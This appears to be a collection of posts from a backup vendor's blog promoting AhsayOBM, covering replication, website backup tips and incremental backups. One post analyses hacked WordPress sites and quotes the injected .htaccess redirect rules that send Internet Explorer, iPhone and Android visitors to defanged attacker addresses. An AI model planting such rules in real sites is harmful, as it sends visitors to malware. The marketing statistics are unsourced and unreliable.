AhsayOBM: The Backup and Disaster Recovery Choice for Major Partners

Reputation certainly matters in the Business Disaster and Recovery (BDR) market and Ahsay has maintained its reputation as one of the leading solution providers in the industry. Ahsay specializes in backup and disaster recovery for businesses and now partners with major players in the technology world. The AhsayOBM (Ahsay Online Backup Manager) is a comprehensive backup application for virtual hardware, email servers, and databases.

Based out of Hong Kong, Ahsay has become a global leader in enterprise BDR solutions. Scherring Chong, the Develoopment Director of Ahsay, was particularly enthusiastic with how the software has developed over the years. He says: “Ahsay Systems Corporation Limited is the leading backup software vendor worldwide. The AhsayOBM is definitely a state of the art application that backups corporate data and systems in local and offsite locations. While it took years of development to get to the point where we are at today, we can now safely claim that we have helped hundreds of SMEs and corporations backup their sensitive and corporate data.”

Ahsay is a Gold Application Development Microsoft Partner, and partners with HP, VMWare, and other technology houses to introduce best practices in corporate backups and security parameters. In terms of global outreach, Ahsay partners with 2,490 companies in North America, 105 in South America, 3,485 in Europe, 3,571 in Asia, 91 in Africa, and 307 in Oceania respectively.

AhsayOBM is widely regarded as the most comprehensive BDR solution to date. Despite its popularity, the team at Ahsay believes that there is still much work to be done in terms of educating businesses about the significance of backups. Nevertheless, Scherring believes that AhsayOBM has the potential to become the benchmark in BDR. He says: “Fundamentally, it is our corporate responsibility to educate our clients about the importance of data backup and implementing security features. That is exactly what the AhsayOBM does by helping users understand what is at risk with poor backups. It’s intuitive and user friendly interface makes it a very good application to work on. On top of that, you get the best integrated solutions for your BDR plan!”

AhsayOBM is a 100% restorable BDR application with dedicated server backup modules integrated for Microsoft products, VMware, Hyper-V, and other modules. Despite that, AhsayOBM remains one of the most affordable BDR products currently available in the market. Incorporating comprehensive solutions with competitive prices has been at the core of what Ahsay is all about.

About Ahsay

Ahsay Systems Corporation Limited is backup software vendor based out of Kowloon, Hong Kong. The firm was established in 1999 and has overseen tremendous growth in the past 16 years. As of today, Ahsay is the leading BDR solution provider in the globe and caters to clients and partners in all parts of the world.

At Ahsay, we don’t have a slogan, but a creed that we adhere to, with passion and commitment – “Backing up businesses, not just data”. This has helped us develop various products for backup, disaster recovery, and security implementation to assist our clients in growing their business.

Ahsay KB Ticketing System Maintenance

Due to a scheduled maintenance the Ahsay KB Ticketing System https://kb.ahsay.com will be offline on Saturday June 20th 2015 between 07:00 AM to 1:00 PM Hong Kong time.
Partners will not be able to submit new tickets or view existing tickets. Replies to existing tickets during the maintenance period will be stored temporarily and automatically updated to the KB Ticketing System after the maintenance is completed.
We apologize for any inconvenience caused.

Here’s Why Site-to-Site Data Replication Is Good For Your Business

Many people believe data replication and data backup to be the same, and it is true for the most part. Backup is in itself is the contingency plan, whereas data replication is a part of that plan. If your clients backup data locally, there is still a high chance that their data centers can get attacked by malicious attackers or software. Thus, you need a second defense layer for the files you have backed up.

We, here at Ahsay, are always focused on helping our clients and partners realize how data replication can help their SME stay afloat. Data replication, when incorporated in your contingency plan, can go a long way in protecting your business and helping it grow. Below, we have carefully explained some of the best benefits that come with site-to-site data replication.

Reliability

SMEs generally follow local backup procedures as it allows them to gain complete control over sensitive data and determine the levels of accessibility in the business. Since the data is protected by firewalls and is encrypted with internal security policies, SMEs start believing that they are safe.

However, what are you going to do if something fishy happens at the physical location? What happens to that data, and more importantly, how will your company recover?

When an SME chooses to backup data locally as well as offsite; this assures the business against any pitfalls that occur with only using onsite storage. As such, your business now has the original data, a copy of the data in the local hardware, and another copy of the data in offsite data cloud centers. Hence, in case something happens to your onsite backup, you can always access the required files online. Having such a backup plan can become your selling point once you market your business to the prospect base the right way!

That being said, your web hosts can help you in adding yet another security layer on your data backups. In cases where customers rely on your business entirely to provide ease and secure access to data, you should have a backup plan for your backup plan. What are you going to do once your data center suffers disruptions or gets destroyed? Site-to-site replication is important especially with consumer data as this added layer of redundancy can help you ensure smooth operations even at critical times.

Continuity

Just as data loss can be devastating for an SME, so are the time and resources lost while recovering data that is fundamental for the smooth operations of your workflow. To reduce this downtime in recovery, offsite replication is very important. With an offsite data center, you won’t have to worry about angry clients and customers who are asking for compensation while your local hardware and onsite data is destroyed. Offsite replication allows you to restore data to its current state and significantly reduces downtime and client dissatisfaction subsequently. Additionally, SMEs that offer offsite cloud backups can give their customers easy access to data across all devices as long as there is an internet connection.

Customer satisfaction is a necessity for business growth. If you misplace important data in a disaster situation, you are bound to lose some of your business and subsequently, referrals. Not many people will refer your services to their associates if their data was jeopardized. In an online business, you are selling trust with security, which is why an offsite data center is crucial to say the least. In any backup and disaster recovery (BDR) plan, the focus is to promote business continuity which can only happen once your clients, partners, and customers start to feel safe and secure with how you manage their data.

Compliance

It is possible that your clients and partners are operating in industries where they have to ensure their compliance to set of standards and regulations. For instance, in the healthcare sector, your clients will be subject to HIPAA compliance and may face huge legal proceedings in case of data breach. Similarly, different clients in different industries will be subject to different rules in how their data is protected. The same applies to your business, which means the importance of data replication only increases.

At the same time though, your clients may have personally identifiable information (PII), records, banking details, and much more of their customers. Should your client’s own backup system fail, you should be able to salvage the situation. In cases where clients don’t have a backup strategy, it is your job to help them implement data redundancy to ensure their compliance with their industry regulations at all times. This is a huge selling point for your business and can help you win more referrals!

Scalability

Just take a moment to think about the amount of data your clients work with. Is it possible to archive all data and keep it onsite for years and years? Well, data accumulates fairly quickly, so ongoing purchases of local storage are not really scalable. Your clients may not be able to afford it, especially when they have invested significantly on initial hardware.

At Ahsay, we serve our clients with the best data backup and replication software, AhsayOBM, that transfers the backups to our AhsayOBS, which itself is a backup server. Hence, whenever you need replication, all you have to do is install AhsayRPS on offsite server and the encrypted data will be replicated in real time. So when you have a case of potential data loss, you can restore the backup data and decrypt it to continue your work as-is.

Hacked Websites Are Redirecting to Bitcoin

If you haven’t noticed, since the past quarter, a large number of hacked websites have redirected traffic to the BitCoin website. You’re probably thinking that BitCoin may be involved in something fishy, using black hat SEO; for example. Despite being the ‘official’ currency of the deep web, BitCoin has little to do with this malicious activity. As you can see from the capture on Unmask Parasites, some specific browsers are redirecting traffic on hacked websites to the crypto-currency website.

From the capture, you’ll also notice that these hacked websites don’t actually redirect traffic directly to BitCoin. Instead, the traffic is redirected to an IP shown with the suspicious tab that acts as the traffic directing system (TDS). In this activity, we can see that the TDS requests specific parameters from a visitor, including browser, IP, referrer, and so on. It then decides as to what to do with a particular request. In simple words, when you click on an ad on a hacked website on a specific browser, your IP is traced and then redirected to an IP similar to the one above, after which you’ll land on BitCoin. Essentially, a TDS can have various routes for users in different countries or with different browsers.

TDS and BitCoin

<img src = ‘http://www.cisco.com/web/about/ac123/ac147/images/ipj/ipj_7-4/dos_figure_4.gif’>

Earlier this year in January, BitCoin had to endure plummeting shares as a result of a major $5 million worth of BitCoin currency theft. As most of the recent malicious and cybercrimes are taking place from the deep web, it is next to impossible to decrypt the actual location and IP where the activity is coming from.

To add to that, a TDS may not respond to certain requests, for instance; requests from security bots, search engines, or even browsers with good security framework. Any typical TDS in this regard may either load an error page like 404 Page Not Found, or it may redirect traffic to third-party websites. The reason why your search queries bring a million results but less than a hundred specific to your needs is because most TDS are preconfigured to redirect unwanted traffic to Google.

In the case of BitCoin, the TDS is configured to redirect unwanted traffic to the site who knows for what intentions. However, it is likely that the initiative is intended to make BitCoin more popular. The malicious redirects are for the unwanted traffic, but as users are already on a hacked website, what do the attackers want from the ones they’re interested in?

The Internet Explorer, which is no longer a part of Microsoft’s future ventures, is a browser most prone to these malicious attacks. In fact, the 194 .6 .233 .7/mxjbb . cgi?default IP is redirected to hxxp://corp . thebridge .jp/wp-api.php in Internet Explorer. The wp-api.php acts as a malicious JavaScript that is especially made for Internet Explorer browsers. The script also works in the Internet Explorer 8 compatibility mode and uses ActiveX to inspect the user computer to determine if it has Kaspersky, TrendMicro VMWare, Parallels or Virtual Box deployed. If none of the above are found, a Flash exploit is integrated by the malware from ‘book . bondcube . biz’.

The malicious activity is mostly on blogs and websites managed on WordPress, as the attackers have managed to modify the mod_rewrite rules:

#BEGIN WordPress
RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} “MSIE|Trident|iPhone|Presto” [NC]
RewriteRule ^(.*)$ hxxp://194 .6 .233 .7/mxjbb .cgi?default [L,R=302]
#END WordPress
RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} “MSIE|Trident|iPhone|Presto” [NC]
RewriteRule ^(.*)$ hxxp://194 .6 .233 .7/mxjbb .cgi?default [L,R=302]
#END WordPress

The malicious TDS redirects traffic from the Internet Explorer, MSIE, Trident, Presto browsers (Opera) and the iPhone browsers to 194 .6 .233 .7. As the code is conveniently placed between #BEGIN WordPress and #END WordPress, it’s quite easy to be fooled.

Open the Google Safe Browsing Diagnostic page and look for this IP and you’ll see that it has affected 3304 domains up until now in the past 90 days. The IP corresponds to other IP addresses in the 194. 6. 233. 0 – 255 sub-network which Specavtomatika Ltd. operates on from Kiev, Ukraine.

Similar attacks have been going on since the beginning of the year, some of which even targeted Android devices. One such instance in March was when WordPress sites had malicious coding in the .htaccess file:

RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} “android” [NC]
RewriteRule ^(.*)$ hxxp://194 .6 .233 .48/BrowserCheck [L,R=302]
As you can see, the mod_rewrite rules are similar to the one above. Some of the IPs on the hxxp://194 .6 .233 .48/ sub-network conduct malware distribution.

The Problem: Outdated Plugins

As this infection is mostly prevalent on WordPress websites, it wasn’t difficult to connect the pieces of the crime puzzle. Turns out that the outdated Slider Revolution Revslider plugin had vulnerabilities which exposed thousands of WordPress websites to this malicious activity!

While the vulnerabilities were dealt with over a year ago by Slider Revolution, many users didn’t actually update the plug-in despite news from the developers.

Many cyberattacks in the past year or two have been as a result of outdated plug-ins being exploited by cybercrime groups. There could easily be a million websites online that are currently running outdated plugins and themes, on WordPress and across other CMS. This only gives cybercriminals an easy way to compromise websites, systems, and networks that take years to develop and maintain.

At Ahsay, we educate our clients and partners about the potential pitfalls of running outdated themes, plug-ins, and systems in their online framework. While it is essential to back up and protect your data, it is also important to realize that loopholes are inevitable in many cases. And with these digital crime units becoming more organized and encrypted, the best thing we can do is to stay updated with what’s going on in the cyber world.

Hence, the best practice is to have the latest versions of all themes, plugins, APIs, and web applications you are using in order to ensure that you are getting making protection. Through our website firewall, you can always virtually patch your online presence against potential attacks that may cause software vulnerability.

AhsayOBM gives you the benefit of backing up and replicating your data on offsite servers in real time. When data is transferred from AhsayOBM to AhsayRPS, it is encrypted and nonreadable. This enables you to protect your data and systems in case of data theft and restore them back to their original state!

Create a Great Backup Strategy for Your Website

It should be a criminal offense to not have a good backup strategy these days, especially considering the many database hacks that continue to make news every day. Backup was and still is one of the most overlooked aspects in corporate security and the reasons behind it sometimes don’t make much sense. The fact is, even when you have a framework to backup your data, there is still a chance of potential security vulnerability that may expose your data to the wrong people.

Why Is It SO Important?

Despite the fact that backup is the fundamental aspect of corporate security, SMEs to corporations continue to undermine it. The underutilization of this tool can only result in potential data theft, loss, and the impending lawsuits and consumer privacy scares that follow. Remember what happened to the Sony PlayStation Network back in 2011? Even if you discredit that, don’t forget they were the center of attention earlier this year as a result of hackers penetrating the Sony Entertainment network and revealing emails, salaries, potential projects, and much more.

Simply put, a good backup strategy not only saves your website and its data, but also your network in case anything goes wrong. Hence, even if malicious attacks occur and wipe out all the data on your site, or if your web server suffers a hard drive failure, you can undo the damage through backup restoration.

The idea of backing up is so simple that it leads businesses to get complacent. Think about this – you’re running an ecommerce store and your website has been hacked. All your corporate data and Personally Identifiable Information (PII) of consumers is available to the hackers. This exposes you to greater damages than you can perceive, and the costs of such mistakes may end up costing millions!

Public Web Directories

Do you know what’s worse than not having a good backup strategy? It is when your data and files are automatically backed up in the (public_html, httpdocs), otherwise known as public web directory. Why is it worse? Well, to begin with, this is what a public web directory looks like.

Well, the problem with public web directories is that as they contain unpatched and older versions of files and software, consequently they are infested with vulnerabilities over time. On top of that, since it’s a publicly accessible location, any good developer can exploit your files and sensitive data!

In other words, when your data is backed up on a public web directory, it is exposed to more than one risk. This is why developers always recommend that you keep the data in your software completely patched, even when you use a virtual patching application.

Website Backups Tips

So what is the best backup strategy if some backups are actually worse than not having one at all? Well, there are four key elements to a great backup strategy that you should incorporate in your security framework:

1. Backup Location

As a practice, store your backup offsite and never on the server your website is on. This is because backing up on web servers makes it too easy for your data to be infected by malware or destroyed. Offsite backups protect your data from attacks and also against any hardware failure. Hence, if your web server hard drive fails, you won’t be left distraught that you’ve lost your live site and backup data. One good way to back up your data is by using our AhsayRPM to replicate website data offsite.

2. Automation

Your backup system should be automated because people are lazy, and that’s a fact. There’s no guarantee when you can’t automate your backups. It’s too easy to procrastinate and forget to back up your site data, especially when your website is running well. If you can’t invest in automation, at least start scheduling backups to keep check. However, even with scheduling backups, you can never be as sure as anything may go wrong. This is where AhsayOBM can help you back up your server data automatically. Furthermore, it prevents any malware attacks on your database and site.

3. Redundancy

Any good backup strategy has to include redundancy, i.e. backups of backups. It may sound counterproductive, but in fact it gives you assurance that your backups are always available in critical times. Our website backup service can help you implement redundancy through duplication of files in various locations.

4. Regular Tests

All said and done, regularly check your backups to ensure that they actually work. Start off by testing your backups so that all your data is available and back on your live site, using a test domain naturally. Backup testing allows you to make sure that in case there is a critical damage to your data, you can have your website live and running again in little to no time.

A good backup strategy allows you to continue your business operations without disruptions in case of data loss or theft. As a practice, test your backup strategy time to time to ensure that it is suited with growing database and your needs. Moreover, ensure that you protect your website by using backup applications and software that automate the process. AhsayOBM is a great tool to help you do that and much more. Contact us today to find out how products by Ahsay can become the cornerstone of your security plan.

$50.9 Billion in Server Sales in 2014 and Still Only 30% Backup

Having a working backup strategy is more crucial today than it ever was. If this infographic isn’t enough to get you thinking, The Whir recently reported that server sales worldwide increased by 2.3% in 2014. This brings the total expenditure on server sales to a grand total of $50.9 billion, with nearly 9.2 million units shipped worldwide.

The world of business is investing a crazy amount of money in servers, which only makes the hotly debated issue of backups even more important. It’s unequivocally important to understand that backup is more of an investment that protects your data rather than just a security measure especially since 94% of SMEs fail within the first two years of incorporation due to data loss with poor backup.

Old Isn’t Gold Anymore

Are you still using floppy disks for storage? Most probably not, unless you really like the idea of segregating your data in banks of floppy disks to make your life even more difficult!

Similarly, you don’t use satellite phones to communicate today because you have smart phones and the internet for that. So why are your backup techniques outdated? Performing a complete traditional backup today is only adding stress on the servers you maintain. Backup technology is growing, but so it the potential of losing data.

Add to that the fact that more data is being created than ever, so there is obviously more emphasis on data storage as well. So with much data, there’s no point in using any strategy other than the most efficient one available. The point is that unless you incorporate new techniques in your backup strategy, you run the risk of exposing loopholes in your security measures. Just like your WordPress starts to become a nuisance when you don’t install the latest update, your backups won’t be as efficient if you won’t update them.

Incremental Backups

screen_obm_08

It’s common knowledge that the best backup strategy is to back up regularly. However, performing complete traditional data backups only means that your server will be taxed and as a result, the performance level will suffer. And with a growing database, this becomes an alarming issue!

Consider this – the average complete backup takes about 30 minutes to complete. In those 30 minutes, your server performance is compromised, but that’s fine. Down the line though, those 30 minutes could become two hours, and in six months, you had five hours of poor server performance.

Whether you run an SME or a corporation, you need to realize that you can’t afford decreased performance on your server every couple of days. As a result, many companies don’t backup their data as regularly as they should. However, that way you’re only putting weeks to months of data at potential risk of theft or loss, just to have optimum performance of your servers.

Incremental backups are a good strategy to help you avoid complacency. In incremental backups, you only allow files to be backed up that are created or otherwise modified since the last backup. Incremental backups are good in decreasing the time it takes to backup data and free up time spent to attain optimum performance from your servers. However, they are some issues with incremental backups as well.

For instance, when you backup at file level, your system will still search the whole server to locate the new or changed data files. Hence, while you are not backing up all your server data, you are still compromising performance during operations, albeit to a lesser degree!

Block Level Backups

Incremental backup diagramProbably the best way to protect data without taxing servers is by running your backups at block level. The difference in this operation from incremental backup is that only the files that are created or modified since the last operations are sought out. As such, rather than searching your whole server for newly created or modified files, the operation will only read data from blocks they appear in.

One of the biggest benefits of backups at block level is that it preserves the system resources in the long term. Not just that, but backups at block level also offer a continuous and effective data protection framework that is performed as regularly as every 15 minutes without compromising performance.

To Sum it all Up

Increasing expenditure in servers is a clear indication that data is growing at a mind boggling rate. Hence, with more data created every second, minute, hour, and day, the importance of quick and efficient backup operations is only becoming more crucial.

While you can always back up your entire server with long backups that tax your server every month, they’re not really helping you in efficiency. Then again, you don’t want to become lazy with backups and expose your servers to cyber threats, do you?

Collectively we’re spending nearly $50.9 billion on servers, why not spend just a little more on making sure that data loss or theft doesn’t disrupt workflow? With AhsayOBM, you get a comprehensive backup software for your server that automatically and regularly backs up your data without affecting server performance!